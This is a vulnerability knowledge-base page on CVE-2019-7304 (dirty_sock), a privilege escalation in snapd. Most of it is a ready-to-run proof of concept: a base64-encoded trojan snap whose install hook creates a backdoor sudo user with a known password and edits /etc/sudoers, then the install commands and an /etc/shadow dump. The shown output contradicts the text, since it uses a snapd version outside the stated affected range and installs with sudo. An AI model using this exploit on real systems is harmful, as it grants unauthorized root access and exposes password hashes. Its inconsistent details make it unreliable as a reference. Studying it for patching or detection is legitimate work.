Knowledge Base

CVE-2019-7304

Updated 26 May 2026

Background

dirty_sock snapd Privilege Escalation

  1. CVSS
    8.8High
  2. VECTOR
    CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  3. IMPACT
    Privilege escalation
  1. AFFECTED
    snapd2.28< 2.37.1

Dubbed dirty_sock, this vulnerability in snapd's REST API socket allows a local unprivileged user to install a malicious snap package that executes an arbitrary shell script as root during installation. The snapd socket (/run/snapd.socket) was accessible without authentication to local users, enabling installation of devmode snaps that bypass confinement and run install hooks as root.

The exploit works by crafting a snap package with an embedded install hook that creates a privileged backdoor user and adds them to sudoers, then installing it via sudo snap install --devmode.

Reproduction

POC || GTFO

Step 1 — Verify vulnerable snapd version

zsh
test@server-01:/dev/shm$ snap version
snapd 2.47.1-1.el7

Step 2 — Generate the malicious snap

The base64 blob encodes a snap package with an install hook that creates user dirty_sock (password: dirty_sock) and grants them full sudo access:

zsh
python2 -c "print 'aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw' + 'A'*4256 + '=='" | base64 -d > TROJAN_SNAP.snap

Step 3 — Install the malicious snap and escalate

zsh
test@server-01:/dev/shm$ sudo snap install --devmode TROJAN_SNAP.snap
trojan-snap 0.1 installed
 
test@server-01:/dev/shm$ su dirty_sock
Password: dirty_sock
 
dirty_sock@server-01:/dev/shm$ id
uid=1001(dirty_sock) gid=1001(dirty_sock) groups=1001(dirty_sock),27(sudo)

Step 4 — Read sensitive host files

zsh
dirty_sock@server-01:/dev/shm$ sudo cat /etc/shadow
[sudo] password for dirty_sock:
root:*:18913:0:99999:7:::
test:$6$L4P7zWSWMneyHjiC$bn2ZrxhEo8Pzc3U3xmd7C64Qe/tztpMBwYp/9H2EvyyRpbucjDx38gB0BQH8wQYB3A3.0BlbAG3JM2jLPwAOW1:19088:0:99999:7:::
dirty_sock:$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.:19110:0:99999:7:::
References

Further reading